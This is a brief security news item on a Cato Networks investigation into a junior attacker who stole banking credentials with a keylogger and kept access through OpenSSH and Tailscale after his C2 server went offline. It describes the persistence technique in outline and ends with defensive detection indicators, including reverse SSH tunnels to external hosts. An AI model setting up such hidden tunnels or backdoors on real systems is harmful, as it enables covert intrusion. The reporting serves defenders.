A French-speaking attacker broke into a small automotive business, planted a keylogger, and stole banking credentials. Standard stuff — until he did something clever.
Before his command-and-control server went offline, he installed OpenSSH and Tailscale on a victim’s machine. That gave him a separate tunnel that didn’t depend on the C2 at all. When the Havoc server went dark the next day, his access survived.
Cato Networks captured the entire operation — 339 commands over 33 days — after the attacker left his SSH keys and a step-by-step playbook in an open storage bucket. Researchers call it “Operation Poisson.”
The attacker, a self-described junior operator on what looks like a school schedule, ran everything on free-tier tools: DuckDNS, Backblaze B2, a cheap IONOS VPS. He leaked his home directory five times and named his buckets after his own handle. He failed at roughly half his attempts but still compromised four machines.
Here’s the takeaway: pulling a C2 offline isn’t remediation if the attacker has already built a backdoor. The tools are all legitimate — signed binaries, standard remote-access software. Detection that only looks for bad files, not bad behavior, will miss this entirely.
Cato’s alert list: watch for OpenSSH Server on Windows workstations, tailscale.exe on machines that don’t need a VPN, and ssh -R reverse tunnels heading to external hosts.
